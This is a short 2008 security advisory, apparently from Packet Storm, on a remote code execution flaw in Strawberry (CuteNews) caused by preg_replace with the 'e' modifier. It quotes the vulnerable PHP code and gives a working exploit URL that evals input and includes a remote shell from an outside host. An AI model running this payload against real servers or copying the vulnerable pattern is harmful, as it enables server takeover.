cutenews-exec.txt

2008-01-07T00:00:00
ID PACKETSTORM:62347
Type packetstorm
Reporter Eugene Minaev
Modified 2008-01-07T00:00:00

Description

                                        
                                            `----[ CuteNews Remote Code Execution ... ITDefence.ru Antichat.ru ]  
  
Strawberry (CuteNews) Remote Code Execution  
Eugene Minaev underwater@itdefence.ru  
___________________________________________________________________  
____/ __ __ _______________________ _______ _______________ \ \ \  
/ .\ / /_// // / \ \/ __ \ /__/ /  
/ / /_// /\ / / / / /___/  
\/ / / / / /\ / / /  
/ / \/ / / / / /__ //\  
\ / ____________/ / \/ __________// /__ // /   
/\\ \_______/ \________________/____/ 2007 /_//_/ // //\  
\ \\ // // /  
.\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / .   
. \_\\________[________________________________________]_________//_//_/ . .  
  
Preg_replace with 'e' modifier allows code execution  
<?php  
  
$source = htmlspecialchars($text);  
  
$source = preg_replace(  
'/<!--(.*?)-->/es',  
'"<span style=\"color: ".$options["color"]["comment"].";\"><!--".  
str_replace("<","<<!-- -->",  
str_replace("=","=<!-- -->",  
"$1")).  
"--></span>"',  
$source);   
  
?>  
  
strawberry/plugins/wacko/highlight/html.php?text=%3C!--{${eval($s)}}--%3E&s=include('blackybr.nm.ru/shell');  
  
  
----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]  
  
`